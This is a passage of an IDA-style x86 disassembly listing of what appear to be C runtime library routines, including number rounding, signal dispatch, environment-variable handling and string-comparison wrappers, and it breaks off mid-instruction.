loc_4258F0: ; CODE XREF: sub_4256C2+1DCj mov cl, [eax-1] dec eax dec eax cmp cl, 35h lea ecx, [ebx+4] jl short loc_42592D loc_4258FD: ; CODE XREF: sub_4256C2+248j cmp eax, ecx jb short loc_425910 cmp byte ptr [eax], 39h jnz short loc_42590C mov byte ptr [eax], 30h dec eax jmp short loc_4258FD ; --------------------------------------------------------------------------- loc_42590C: ; CODE XREF: sub_4256C2+242j cmp eax, ecx jnb short loc_425914 loc_425910: ; CODE XREF: sub_4256C2+23Dj inc eax inc word ptr [ebx] loc_425914: ; CODE XREF: sub_4256C2+24Cj inc byte ptr [eax] loc_425916: ; CODE XREF: sub_4256C2+279j sub al, bl sub al, 3 mov [ebx+3], al movsx eax, al and byte ptr [eax+ebx+4], 0 loc_425925: ; CODE XREF: sub_4256C2+F0j mov eax, [ebp+var_4] loc_425928: ; CODE XREF: sub_4256C2+291j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_42592D: ; CODE XREF: sub_4256C2+239j ; sub_4256C2+275j cmp eax, ecx jb short loc_42593D cmp byte ptr [eax], 30h jnz short loc_425939 dec eax jmp short loc_42592D ; --------------------------------------------------------------------------- loc_425939: ; CODE XREF: sub_4256C2+272j cmp eax, ecx jnb short loc_425916 loc_42593D: ; CODE XREF: sub_4256C2+26Dj and word ptr [ebx], 0 mov byte ptr [ebx+2], 20h mov byte ptr [ebx+3], 1 mov byte ptr [ecx], 30h loc_42594C: ; CODE XREF: sub_4256C2+87j and byte ptr [ebx+5], 0 push 1 pop eax jmp short loc_425928 sub_4256C2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_425955 proc near ; CODE XREF: sub_42255C+226Dp arg_0 = dword ptr 8 push ebp mov ebp, esp push esi push edi mov edi, [ebp+arg_0] mov eax, edi dec eax dec eax jz short loc_4259BC dec eax dec eax jz short loc_4259AD sub eax, 4 jz short loc_4259AD sub eax, 3 jz short loc_4259AD sub eax, 4 jz short loc_4259A0 sub eax, 6 jz short loc_425993 dec eax jz short loc_425986 or eax, 0FFFFFFFFh jmp loc_425A7E ; --------------------------------------------------------------------------- loc_425986: ; CODE XREF: sub_425955+27j mov esi, ds:dword_4DBC5C mov eax, offset dword_4DBC5C jmp short loc_4259C7 ; --------------------------------------------------------------------------- loc_425993: ; CODE XREF: sub_425955+24j mov esi, ds:dword_4DBC58 mov eax, offset dword_4DBC58 jmp short loc_4259C7 ; --------------------------------------------------------------------------- loc_4259A0: ; CODE XREF: sub_425955+1Fj mov esi, ds:dword_4DBC60 mov eax, offset dword_4DBC60 jmp short loc_4259C7 ; --------------------------------------------------------------------------- loc_4259AD: ; CODE XREF: sub_425955+10j ; sub_425955+15j ... push edi call sub_425A82 mov esi, [eax+8] add eax, 8 pop ecx jmp short loc_4259C7 ; --------------------------------------------------------------------------- loc_4259BC: ; CODE XREF: sub_425955+Cj mov esi, ds:dword_4DBC54 mov eax, offset dword_4DBC54 loc_4259C7: ; CODE XREF: sub_425955+3Cj ; sub_425955+49j ... cmp esi, 1 jnz short loc_4259D3 xor eax, eax jmp loc_425A7E ; --------------------------------------------------------------------------- loc_4259D3: ; CODE XREF: sub_425955+75j test esi, esi jnz short loc_4259DE push 3 call sub_41B7C2 loc_4259DE: ; CODE XREF: sub_425955+80j push ebx push 8 pop ecx cmp edi, ecx jz short loc_4259F0 cmp edi, 0Bh jz short loc_4259F0 cmp edi, 4 jnz short loc_425A16 loc_4259F0: ; CODE XREF: sub_425955+8Fj ; sub_425955+94j mov ebx, ds:dword_4DBA30 and ds:dword_4DBA30, 0 cmp edi, ecx jnz short loc_425A45 mov edx, dword_43D02C mov dword_43D02C, 8Ch mov [ebp+arg_0], edx jmp short loc_425A19 ; --------------------------------------------------------------------------- loc_425A16: ; CODE XREF: sub_425955+99j mov ebx, [ebp+arg_0] loc_425A19: ; CODE XREF: sub_425955+BFj cmp edi, ecx jnz short loc_425A45 mov eax, dword_43D020 mov ecx, dword_43D024 add ecx, eax cmp eax, ecx jge short loc_425A4C lea edx, [eax+eax*2] sub ecx, eax lea edx, ds:43CFB0h[edx*4] loc_425A3A: ; CODE XREF: sub_425955+ECj and dword ptr [edx], 0 add edx, 0Ch dec ecx jnz short loc_425A3A jmp short loc_425A4C ; --------------------------------------------------------------------------- loc_425A45: ; CODE XREF: sub_425955+AAj ; sub_425955+C6j and dword ptr [eax], 0 cmp edi, ecx jnz short loc_425A5A loc_425A4C: ; CODE XREF: sub_425955+D7j ; sub_425955+EEj push dword_43D02C push 8 call esi pop ecx pop ecx jmp short loc_425A68 ; --------------------------------------------------------------------------- loc_425A5A: ; CODE XREF: sub_425955+F5j push edi call esi cmp edi, 0Bh pop ecx jz short loc_425A68 cmp edi, 4 jnz short loc_425A7B loc_425A68: ; CODE XREF: sub_425955+103j ; sub_425955+10Cj cmp edi, 8 mov ds:dword_4DBA30, ebx jnz short loc_425A7B mov eax, [ebp+arg_0] mov dword_43D02C, eax loc_425A7B: ; CODE XREF: sub_425955+111j ; sub_425955+11Cj xor eax, eax pop ebx loc_425A7E: ; CODE XREF: sub_425955+2Cj ; sub_425955+79j pop edi pop esi pop ebp retn sub_425955 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_425A82 proc near ; CODE XREF: sub_425955+59p arg_0 = dword ptr 4 mov edx, [esp+arg_0] mov ecx, dword_43D028 cmp dword_43CFAC, edx push esi mov eax, offset dword_43CFA8 jz short loc_425AB0 lea esi, [ecx+ecx*2] lea esi, ds:43CFA8h[esi*4] loc_425AA4: ; CODE XREF: sub_425A82+2Cj add eax, 0Ch cmp eax, esi jnb short loc_425AB0 cmp [eax+4], edx jnz short loc_425AA4 loc_425AB0: ; CODE XREF: sub_425A82+16j ; sub_425A82+27j lea ecx, [ecx+ecx*2] pop esi lea ecx, ds:43CFA8h[ecx*4] cmp eax, ecx jnb short loc_425AC4 cmp [eax+4], edx jz short locret_425AC6 loc_425AC4: ; CODE XREF: sub_425A82+3Bj xor eax, eax locret_425AC6: ; CODE XREF: sub_425A82+40j retn sub_425A82 endp ; =============== S U B R O U T I N E ======================================= sub_425AC7 proc near ; CODE XREF: sub_4247EC+23p arg_0 = dword ptr 4 cmp ds:dword_4DCFF0, 0 push ebx push esi mov esi, ds:dword_4DB980 push edi jz short loc_425B3E test esi, esi jnz short loc_425AF8 cmp ds:dword_4DB988, esi jz short loc_425B3E call sub_425E95 test eax, eax jnz short loc_425B3E mov esi, ds:dword_4DB980 test esi, esi jz short loc_425B3E loc_425AF8: ; CODE XREF: sub_425AC7+14j mov ebx, [esp+0Ch+arg_0] test ebx, ebx jz short loc_425B3E push ebx call sub_41AFE0 pop ecx mov edi, eax loc_425B09: ; CODE XREF: sub_425AC7+6Dj mov eax, [esi] test eax, eax jz short loc_425B3E push eax call sub_41AFE0 cmp eax, edi pop ecx jbe short loc_425B31 mov eax, [esi] cmp byte ptr [eax+edi], 3Dh jnz short loc_425B31 push edi push ebx push eax call sub_425E56 add esp, 0Ch test eax, eax jz short loc_425B36 loc_425B31: ; CODE XREF: sub_425AC7+51j ; sub_425AC7+59j add esi, 4 jmp short loc_425B09 ; --------------------------------------------------------------------------- loc_425B36: ; CODE XREF: sub_425AC7+68j mov eax, [esi] lea eax, [eax+edi+1] jmp short loc_425B40 ; --------------------------------------------------------------------------- loc_425B3E: ; CODE XREF: sub_425AC7+10j ; sub_425AC7+1Cj ... xor eax, eax loc_425B40: ; CODE XREF: sub_425AC7+75j pop edi pop esi pop ebx retn sub_425AC7 endp ; =============== S U B R O U T I N E ======================================= sub_425B44 proc near ; CODE XREF: sub_424F0A+8Bp ; sub_424F0A+D9p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] push esi cmp eax, ds:dword_4DCDA0 jnb short loc_425BAB mov ecx, eax and eax, 1Fh sar ecx, 5 mov ecx, ds:dword_4DCCA0[ecx*4] lea edx, [ecx+eax*8+4] mov cl, [ecx+eax*8+4] test cl, 1 jz short loc_425BAB mov al, cl mov esi, 8000h and eax, 80h cmp [esp+4+arg_4], esi jnz short loc_425B84 and cl, 7Fh jmp short loc_425B91 ; --------------------------------------------------------------------------- loc_425B84: ; CODE XREF: sub_425B44+39j cmp [esp+4+arg_4], 4000h jnz short loc_425B9F or cl, 80h loc_425B91: ; CODE XREF: sub_425B44+3Ej neg eax sbb eax, eax mov [edx], cl and ax, 0C000h add eax, esi pop esi retn ; --------------------------------------------------------------------------- loc_425B9F: ; CODE XREF: sub_425B44+48j mov ds:dword_4DB958, 16h jmp short loc_425BB5 ; --------------------------------------------------------------------------- loc_425BAB: ; CODE XREF: sub_425B44+Bj ; sub_425B44+27j mov ds:dword_4DB958, 9 loc_425BB5: ; CODE XREF: sub_425B44+65j or eax, 0FFFFFFFFh pop esi retn sub_425B44 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_425BBA proc near ; CODE XREF: sub_4256C2+165p ; sub_425DDA+69p var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 24h push ebx mov ebx, [ebp+arg_4] push esi mov esi, [ebp+arg_0] mov cx, [ebx+0Ah] xor eax, eax push edi mov [ebp+var_14], eax mov [ebp+var_24], eax mov [ebp+var_20], eax mov [ebp+var_1C], eax mov ax, [esi+0Ah] mov edi, ecx mov edx, 7FFFh xor edi, eax and eax, edx and ecx, edx and edi, 8000h cmp ax, 7FFFh lea edx, [ecx+eax] mov [ebp+arg_0], edx jnb loc_425DBA cmp cx, 7FFFh jnb loc_425DBA cmp dx, 0BFFDh ja loc_425DBA cmp dx, 3FBFh ja short loc_425C23 xor eax, eax jmp short loc_425C5D ; --------------------------------------------------------------------------- loc_425C23: ; CODE XREF: sub_425BBA+63j test ax, ax mov edx, 7FFFFFFFh jnz short loc_425C45 inc [ebp+arg_0] test [esi+8], edx jnz short loc_425C45 xor eax, eax cmp [esi+4], eax jnz short loc_425C47 cmp [esi], eax jnz short loc_425C47 jmp loc_425DB4 ; --------------------------------------------------------------------------- loc_425C45: ; CODE XREF: sub_425BBA+71j ; sub_425BBA+79j xor eax, eax loc_425C47: ; CODE XREF: sub_425BBA+80j ; sub_425BBA+84j cmp cx, ax jnz short loc_425C6A inc [ebp+arg_0] test [ebx+8], edx jnz short loc_425C6A cmp [ebx+4], eax jnz short loc_425C6A cmp [ebx], eax jnz short loc_425C6A loc_425C5D: ; CODE XREF: sub_425BBA+67j mov [esi+8], eax mov [esi+4], eax mov [esi], eax jmp loc_425DD5 ; --------------------------------------------------------------------------- loc_425C6A: ; CODE XREF: sub_425BBA+90j ; sub_425BBA+98j ... mov [ebp+var_10], eax lea eax, [ebp+var_20] mov [ebp+var_4], eax mov [ebp+arg_4], 5 loc_425C7A: ; CODE XREF: sub_425BBA+122j mov eax, [ebp+var_10] add eax, eax cmp [ebp+arg_4], 0 jle short loc_425CCE add eax, esi lea ecx, [ebx+8] mov [ebp+var_8], eax mov eax, [ebp+arg_4] mov [ebp+var_C], ecx mov [ebp+var_18], eax loc_425C96: ; CODE XREF: sub_425BBA+112j mov eax, [ebp+var_8] mov ecx, [ebp+var_C] movzx eax, word ptr [eax] movzx ecx, word ptr [ecx] imul eax, ecx mov ecx, [ebp+var_4] add ecx, 0FFFFFFFCh push ecx push eax push dword ptr [ecx] call sub_425050 add esp, 0Ch test eax, eax jz short loc_425CC1 mov eax, [ebp+var_4] inc word ptr [eax] loc_425CC1: ; CODE XREF: sub_425BBA+FFj add [ebp+var_8], 2 sub [ebp+var_C], 2 dec [ebp+var_18] jnz short loc_425C96 loc_425CCE: ; CODE XREF: sub_425BBA+C9j add [ebp+var_4], 2 inc [ebp+var_10] dec [ebp+arg_4] cmp [ebp+arg_4], 0 jg short loc_425C7A add [ebp+arg_0], 0C002h cmp word ptr [ebp+arg_0], 0 jle short loc_425D11 loc_425CEC: ; CODE XREF: sub_425BBA+14Ej test byte ptr [ebp+var_1C+3], 80h jnz short loc_425D0A lea eax, [ebp+var_24] push eax call sub_4250CF add [ebp+arg_0], 0FFFFh pop ecx cmp word ptr [ebp+arg_0], 0 jg short loc_425CEC loc_425D0A: ; CODE XREF: sub_425BBA+136j cmp word ptr [ebp+arg_0], 0 jg short loc_425D4A loc_425D11: ; CODE XREF: sub_425BBA+130j add [ebp+arg_0], 0FFFFh cmp word ptr [ebp+arg_0], 0 jge short loc_425D4A movsx eax, word ptr [ebp+arg_0] neg eax add [ebp+arg_0], eax mov ebx, eax loc_425D2A: ; CODE XREF: sub_425BBA+184j test byte ptr [ebp+var_24], 1 jz short loc_425D33 inc [ebp+var_14] loc_425D33: ; CODE XREF: sub_425BBA+174j lea eax, [ebp+var_24] push eax call sub_4250FD dec ebx pop ecx jnz short loc_425D2A cmp [ebp+var_14], 0 jz short loc_425D4A or byte ptr [ebp+var_24], 1 loc_425D4A: ; CODE XREF: sub_425BBA+155j ; sub_425BBA+163j ... cmp word ptr [ebp+var_24], 8000h ja short loc_425D61 mov eax, [ebp+var_24] and eax, 1FFFFh cmp eax, 18000h jnz short loc_425D96 loc_425D61: ; CODE XREF: sub_425BBA+196j cmp [ebp+var_24+2], 0FFFFFFFFh jnz short loc_425D93 and [ebp+var_24+2], 0 cmp [ebp+var_20+2], 0FFFFFFFFh jnz short loc_425D8E and [ebp+var_20+2], 0 cmp word ptr [ebp+var_1C+2], 0FFFFh jnz short loc_425D88 inc [ebp+arg_0] mov word ptr [ebp+var_1C+2], 8000h jmp short loc_425D96 ; --------------------------------------------------------------------------- loc_425D88: ; CODE XREF: sub_425BBA+1C1j inc word ptr [ebp+var_1C+2] jmp short loc_425D96 ; --------------------------------------------------------------------------- loc_425D8E: ; CODE XREF: sub_425BBA+1B5j inc [ebp+var_20+2] jmp short loc_425D96 ; --------------------------------------------------------------------------- loc_425D93: ; CODE XREF: sub_425BBA+1ABj inc [ebp+var_24+2] loc_425D96: ; CODE XREF: sub_425BBA+1A5j ; sub_425BBA+1CCj ... mov eax, [ebp+arg_0] cmp ax, 7FFFh jnb short loc_425DBA mov cx, word ptr [ebp+var_24+2] or eax, edi mov [esi], cx mov ecx, [ebp+var_20] mov [esi+2], ecx mov ecx, [ebp+var_1C] mov [esi+6], ecx loc_425DB4: ; CODE XREF: sub_425BBA+86j mov [esi+0Ah], ax jmp short loc_425DD5 ; --------------------------------------------------------------------------- loc_425DBA: ; CODE XREF: sub_425BBA+42j ; sub_425BBA+4Dj ... neg di sbb edi, edi and dword ptr [esi+4], 0 and edi, 80000000h add edi, 7FFF8000h and dword ptr [esi], 0 mov [esi+8], edi loc_425DD5: ; CODE XREF: sub_425BBA+ABj ; sub_425BBA+1FEj pop edi pop esi pop ebx leave retn sub_425BBA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_425DDA proc near ; CODE XREF: sub_4251F1+440p ; sub_4256C2+14Cp var_C = byte ptr -0Ch var_A = dword ptr -0Ah arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 0Ch push ebx mov ebx, offset dword_43D4A8 xor ecx, ecx sub ebx, 60h cmp [ebp+arg_4], ecx jz short loc_425E53 jge short loc_425E02 mov eax, [ebp+arg_4] mov ebx, offset dword_43D608 neg eax mov [ebp+arg_4], eax sub ebx, 60h loc_425E02: ; CODE XREF: sub_425DDA+16j cmp [ebp+arg_8], ecx jnz short loc_425E0D mov eax, [ebp+arg_0] mov [eax], cx loc_425E0D: ; CODE XREF: sub_425DDA+2Bj cmp [ebp+arg_4], ecx jz short loc_425E53 push esi push edi loc_425E14: ; CODE XREF: sub_425DDA+75j mov eax, [ebp+arg_4] add ebx, 54h sar [ebp+arg_4], 3 and eax, 7 cmp eax, ecx jz short loc_425E4C lea eax, [eax+eax*2] cmp word ptr [ebx+eax*4], 8000h lea esi, [ebx+eax*4] jb short loc_425E3F lea edi, [ebp+var_C] movsd movsd movsd dec [ebp+var_A] lea esi, [ebp+var_C] loc_425E3F: ; CODE XREF: sub_425DDA+57j push esi push [ebp+arg_0] call sub_425BBA pop ecx pop ecx xor ecx, ecx loc_425E4C: ; CODE XREF: sub_425DDA+49j cmp [ebp+arg_4], ecx jnz short loc_425E14 pop edi pop esi loc_425E53: ; CODE XREF: sub_425DDA+14j ; sub_425DDA+36j pop ebx leave retn sub_425DDA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_425E56 proc near ; CODE XREF: sub_425AC7+5Ep ; sub_426332+18p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp cmp [ebp+arg_8], 0 jnz short loc_425E63 xor eax, eax pop ebp retn ; --------------------------------------------------------------------------- loc_425E63: ; CODE XREF: sub_425E56+7j push ds:dword_4DCDA4 push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_8] push [ebp+arg_0] push 1 push ds:dword_4DCFC4 call sub_425F03 add esp, 1Ch test eax, eax jnz short loc_425E90 mov eax, 7FFFFFFFh pop ebp retn ; --------------------------------------------------------------------------- loc_425E90: ; CODE XREF: sub_425E56+31j add eax, 0FFFFFFFEh pop ebp retn sub_425E56 endp ; =============== S U B R O U T I N E ======================================= sub_425E95 proc near ; CODE XREF: sub_425AC7+1Ep ; sub_4261AB+5Bp var_4 = dword ptr -4 push ecx push ebx push ebp push esi mov esi, ds:dword_4DB988 push edi xor edi, edi mov eax, [esi] cmp eax, edi jz short loc_425EF6 mov ebx, dword_42717C loc_425EAE: ; CODE XREF: sub_425E95+5Fj push edi push edi push edi push edi push 0FFFFFFFFh push eax push edi push 1 call ebx ; WideCharToMultiByte mov ebp, eax cmp ebp, edi jz short loc_425EFE push ebp call sub_41B4D5 cmp eax, edi pop ecx mov [esp+14h+var_4], eax jz short loc_425EFE push edi push edi push ebp push eax push 0FFFFFFFFh push dword ptr [esi] push edi push 1 call ebx ; WideCharToMultiByte test eax, eax jz short loc_425EFE push edi push [esp+18h+var_4] call sub_4261AB mov eax, [esi+4] add esi, 4 pop ecx cmp eax, edi pop ecx jnz short loc_425EAE loc_425EF6: ; CODE XREF: sub_425E95+11j xor eax, eax loc_425EF8: ; CODE XREF: sub_425E95+6Cj pop edi pop esi pop ebp pop ebx pop ecx retn ; --------------------------------------------------------------------------- loc_425EFE: ; CODE XREF: sub_425E95+29j ; sub_425E95+38j ... or eax, 0FFFFFFFFh jmp short loc_425EF8 sub_425E95 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_425F03 proc near ; CODE XREF: sub_425E56+27p var_3C = dword ptr -3Ch var_36 = byte ptr -36h var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch arg_18 = dword ptr 20h push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_427CE8 push offset sub_4234B8 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 30h push ebx push esi push edi mov [ebp+var_18], esp xor ebx, ebx cmp ds:dword_4DBC68, ebx push 1 pop edi jnz short loc_425F76 push edi mov eax, offset dword_427938 push eax push edi push eax push ebx push ebx call dword_427008 ; CompareStringW test eax, eax jz short loc_425F53 mov ds:dword_4DBC68, edi jmp short loc_425F76 ; --------------------------------------------------------------------------- loc_425F53: ; CODE XREF: sub_425F03+46j push edi mov eax, offset dword_4CB50C push eax push edi push eax push ebx push ebx call dword_42700C ; CompareStringA test eax, eax jz loc_42616C mov ds:dword_4DBC68, 2 loc_425F76: ; CODE XREF: sub_425F03+31j ; sub_425F03+4Ej mov esi, [ebp+arg_C] cmp esi, ebx jle short loc_425F8D push esi push [ebp+arg_8] call sub_426180 pop ecx pop ecx mov esi, eax mov [ebp+arg_C], esi loc_425F8D: ; CODE XREF: sub_425F03+78j cmp [ebp+arg_14], ebx jle short loc_425FA2 push [ebp+arg_14] push [ebp+arg_10] call sub_426180 pop ecx pop ecx mov [ebp+arg_14], eax loc_425FA2: ; CODE XREF: sub_425F03+8Dj mov eax, ds:dword_4DBC68 cmp eax, 2 jnz short loc_425FC7 push [ebp+arg_14] push [ebp+arg_10] push esi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_42700C ; CompareStringA jmp loc_42616E ; --------------------------------------------------------------------------- loc_425FC7: ; CODE XREF: sub_425F03+A7j cmp eax, edi jnz loc_42616C cmp [ebp+arg_18], ebx jnz short loc_425FDC mov eax, ds:dword_4DBA24 mov [ebp+arg_18], eax loc_425FDC: ; CODE XREF: sub_425F03+CFj cmp esi, ebx jz short loc_425FE9 cmp [ebp+arg_14], ebx jnz loc_426081 loc_425FE9: ; CODE XREF: sub_425F03+DBj cmp esi, [ebp+arg_14] jnz short loc_425FF6 loc_425FEE: ; CODE XREF: sub_425F03+13Cj ; sub_425F03+16Dj push 2 loc_425FF0: ; CODE XREF: sub_425F03+146j pop eax jmp loc_42616E ; --------------------------------------------------------------------------- loc_425FF6: ; CODE XREF: sub_425F03+E9j cmp [ebp+arg_14], edi jle short loc_426002 loc_425FFB: ; CODE XREF: sub_425F03+151j ; sub_425F03+159j ... mov eax, edi jmp loc_42616E ; --------------------------------------------------------------------------- loc_426002: ; CODE XREF: sub_425F03+F6j cmp esi, edi jg short loc_426047 lea eax, [ebp+var_3C] push eax push [ebp+arg_18] call dword_4271CC ; GetCPInfo test eax, eax jz loc_42616C cmp esi, ebx jle short loc_42604B cmp [ebp+var_3C], 2 jb short loc_426047 lea eax, [ebp+var_36] cmp [ebp+var_36], bl jz short loc_426047 loc_42602D: ; CODE XREF: sub_425F03+142j mov dl, [eax+1] cmp dl, bl jz short loc_426047 mov ecx, [ebp+arg_8] mov cl, [ecx] cmp cl, [eax] jb short loc_426041 cmp cl, dl jbe short loc_425FEE loc_426041: ; CODE XREF: sub_425F03+138j inc eax inc eax cmp [eax], bl jnz short loc_42602D loc_426047: ; CODE XREF: sub_425F03+101j ; sub_425F03+120j ... push 3 jmp short loc_425FF0 ; --------------------------------------------------------------------------- loc_42604B: ; CODE XREF: sub_425F03+11Aj cmp [ebp+arg_14], ebx jle short loc_426081 cmp [ebp+var_3C], 2 jb short loc_425FFB lea eax, [ebp+var_36] cmp [ebp+var_36], bl jz short loc_425FFB loc_42605E: ; CODE XREF: sub_425F03+177j mov dl, [eax+1] cmp dl, bl jz short loc_425FFB mov ecx, [ebp+arg_10] mov cl, [ecx] cmp cl, [eax] jb short loc_426076 cmp cl, dl jbe loc_425FEE loc_426076: ; CODE XREF: sub_425F03+169j inc eax inc eax cmp [eax], bl jnz short loc_42605E jmp loc_425FFB ; --------------------------------------------------------------------------- loc_426081: ; CODE XREF: sub_425F03+E0j ; sub_425F03+14Bj push ebx push ebx push esi push [ebp+arg_8] push 9 push [ebp+arg_18] call dword_427180 ; MultiByteToWideChar mov [ebp+var_1C], eax cmp eax, ebx jz loc_42616C mov [ebp+var_4], ebx add eax, eax add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov eax, esp mov [ebp+var_24], eax or [ebp+var_4], 0FFFFFFFFh jmp short loc_4260D0 ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor ebx, ebx mov [ebp+var_24], ebx or [ebp+var_4], 0FFFFFFFFh mov esi, [ebp+arg_C] push 1 pop edi loc_4260D0: ; CODE XREF: sub_425F03+1B5j cmp [ebp+var_24], ebx jz loc_42616C push [ebp+var_1C] push [ebp+var_24] push esi push [ebp+arg_8] push edi push [ebp+arg_18] mov esi, dword_427180 call esi ; MultiByteToWideChar test eax, eax jz short loc_42616C push ebx push ebx push [ebp+arg_14] push [ebp+arg_10] push 9 push [ebp+arg_18] call esi ; MultiByteToWideChar mov esi, eax mov [ebp+var_20], esi cmp esi, ebx jz short loc_42616C mov [ebp+var_4], edi lea eax, [esi+esi] add eax, 3 and al, 0FCh call sub_41BB20 mov [ebp+var_18], esp mov edi, esp mov [ebp+var_28], edi or [ebp+var_4], 0FFFFFFFFh jmp short loc_42613B ; --------------------------------------------------------------------------- push 1 pop eax retn ; --------------------------------------------------------------------------- mov esp, [ebp+var_18] xor ebx, ebx xor edi, edi or [ebp+var_4], 0FFFFFFFFh mov esi, [ebp+var_20] loc_42613B: ; CODE XREF: sub_425F03+224j cmp edi, ebx jz short loc_42616C push esi push edi push [ebp+arg_14] push [ebp+arg_10] push 1 push [ebp+arg_18] call dword_427180 ; MultiByteToWideChar test eax, eax jz short loc_42616C push esi push edi push [ebp+var_1C] push [ebp+var_24] push [ebp+arg_4] push [ebp+arg_0] call dword_427008 ; CompareStringW jmp short loc_42616E ; --------------------------------------------------------------------------- loc_42616C: ; CODE XREF: sub_425F03+63j ; sub_425F03+C6j ... xor eax, eax loc_42616E: ; CODE XREF: sub_425F03+BFj ; sub_425F03+EEj ... lea esp, [ebp-4Ch] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_425F03 endp ; =============== S U B R O U T I N E ======================================= sub_426180 proc near ; CODE XREF: sub_422ACA+81p ; sub_425F03+7Ep ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] mov eax, [esp+arg_0] test edx, edx push esi lea ecx, [edx-1] jz short loc_42619D loc_426190: ; CODE XREF: sub_426180+1Bj cmp byte ptr [eax], 0 jz short loc_42619D inc eax mov esi, ecx dec ecx test esi, esi jnz short loc_426190 loc_42619D: ; CODE XREF: sub_426180+Ej ; sub_426180+13j cmp byte ptr [eax], 0 pop esi jnz short loc_4261A8 sub eax, [esp+arg_0] retn ; --------------------------------------------------------------------------- loc_4261A8: ; CODE XREF: sub_426180+21j mov eax, edx retn sub_426180 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4261AB proc near ; CODE XREF: sub_425E95+50p var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push ecx push ebx push esi push edi xor edi, edi cmp [ebp+arg_0], edi jz short loc_42620F push 3Dh push [ebp+arg_0] call sub_4263F1 mov esi, eax pop ecx cmp esi, edi pop ecx mov [ebp+var_8], esi jz short loc_42620F cmp [ebp+arg_0], esi jz short loc_42620F mov eax, ds:dword_4DB980 xor ebx, ebx cmp [esi+1], bl setz bl cmp eax, ds:dword_4DB984 jnz short loc_4261F5 push eax call sub_42638A pop ecx mov ds:dword_4DB980, eax loc_4261F5: ; CODE XREF: sub_4261AB+3Cj cmp eax, edi jnz short loc_42624D cmp [ebp+arg_4], edi jz short loc_426217 cmp ds:dword_4DB988, edi jz short loc_426217 call sub_425E95 test eax, eax jz short loc_42624D loc_42620F: ; CODE XREF: sub_4261AB+Dj ; sub_4261AB+22j ... or eax, 0FFFFFFFFh loc_426212: ; CODE XREF: sub_4261AB+182j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_426217: ; CODE XREF: sub_4261AB+51j ; sub_4261AB+59j cmp ebx, edi jnz loc_42632B push 4 call sub_41B4D5 cmp eax, edi pop ecx mov ds:dword_4DB980, eax jz short loc_42620F mov [eax], edi cmp ds:dword_4DB988, edi jnz short loc_42624D push 4 call sub_41B4D5 cmp eax, edi pop ecx mov ds:dword_4DB988, eax jz short loc_42620F mov [eax], edi loc_42624D: ; CODE XREF: sub_4261AB+4Cj ; sub_4261AB+62j ... sub esi, [ebp+arg_0] mov edi, ds:dword_4DB980 mov [ebp+var_4], edi push esi push [ebp+arg_0] call sub_426332 mov esi, eax pop ecx test esi, esi pop ecx jl short loc_4262AD cmp dword ptr [edi], 0 jz short loc_4262AD test ebx, ebx jz short loc_4262A5 push dword ptr [edi+esi*4] lea edi, [edi+esi*4] call sub_41B0B1 pop ecx loc_42627F: ; CODE XREF: sub_4261AB+E2j cmp dword ptr [edi], 0 jz short loc_42628F mov eax, [edi+4] inc esi mov [edi], eax add edi, 4 jmp short loc_42627F ; --------------------------------------------------------------------------- loc_42628F: ; CODE XREF: sub_4261AB+D7j mov eax, esi shl eax, 2 push eax push [ebp+var_4] call sub_41B202 pop ecx test eax, eax pop ecx jz short loc_4262DF jmp short loc_4262DA ; --------------------------------------------------------------------------- loc_4262A5: ; CODE XREF: sub_4261AB+C6j mov eax, [ebp+arg_0] mov [edi+esi*4], eax jmp short loc_4262DF ; --------------------------------------------------------------------------- loc_4262AD: ; CODE XREF: sub_4261AB+BDj ; sub_4261AB+C2j test ebx, ebx jnz short loc_42632B test esi, esi jge short loc_4262B7 neg esi loc_4262B7: ; CODE XREF: sub_4261AB+108j lea eax, ds:8[esi*4] push eax push edi call sub_41B202 pop ecx test eax, eax pop ecx jz loc_42620F mov ecx, [ebp+arg_0] mov [eax+esi*4], ecx and dword ptr [eax+esi*4+4], 0 loc_4262DA: ; CODE XREF: sub_4261AB+F8j mov ds:dword_4DB980, eax loc_4262DF: ; CODE XREF: sub_4261AB+F6j ; sub_4261AB+100j cmp [ebp+arg_4], 0 jz short loc_42632B push [ebp+arg_0] call sub_41AFE0 inc eax inc eax push eax call sub_41B4D5 mov esi, eax pop ecx test esi, esi pop ecx jz short loc_42632B push [ebp+arg_0] push esi call sub_41BEB0 mov eax, esi pop ecx sub eax, [ebp+arg_0] pop ecx add eax, [ebp+var_8] and byte 